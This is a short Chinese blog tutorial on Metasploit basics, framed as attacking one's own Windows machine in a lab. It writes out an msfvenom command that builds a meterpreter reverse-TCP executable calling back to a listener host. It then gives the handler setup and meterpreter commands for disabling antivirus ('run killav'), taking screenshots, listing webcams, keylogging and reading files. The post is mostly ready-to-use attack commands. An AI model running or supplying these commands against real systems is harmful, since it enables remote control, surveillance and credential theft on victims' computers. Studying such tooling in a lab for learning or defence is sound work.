用msf模拟攻击自己的window,msf基础

生成shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.88 lport=10105 -i 5 -f exe -o /root/windows_shell.exe
msfvenom参数

-p payload

-lhost 本机ip

-lport 监听的端口

-i  次数

-o 保存

-f 编译

-e 编码

 

 把它放到桌面

 然后用msf监听端口 --开启msf

msfconsole

use exploit/multi/handler --使用监听模块

use exploit/multi/handler

show options --查看输入的可选项

show options

设置payload--和生成shell参数设置一致

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.159.88 --kali地址

set lhost 192.168.159.88

set lport 10105 --shell接受端口

set lport 10105 

run --运行,开启监听

run

 

监听成功 

系统命令

查看版本

命令

sysinfo

查看当前账户

getuid

 

查看当前处于本地的哪个目录:

getlwd

查看是否运行在虚拟机上

run post/windows/gather/checkvm

 

查看运行时间

idletime

关闭杀毒软件:run killav

run killav

 

查看当前属于目标机的工作目录的路径名称:pwd

pwd

 

列出当前目录的所有文件:ls

ls

 

查看目标1.txt文件内内容:

cat 1.txt 

 

拍照桌面

screenshot

寻找摄像头

webcam_list

 

杀死进程 进程的PID

kill  进程的PID

记录键盘

keyscan_start

输出

keyscan dump

退出监听

输入background可以暂时退出监听页面,然后sessions可以查看进度然后 session+数字就可回到进度

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值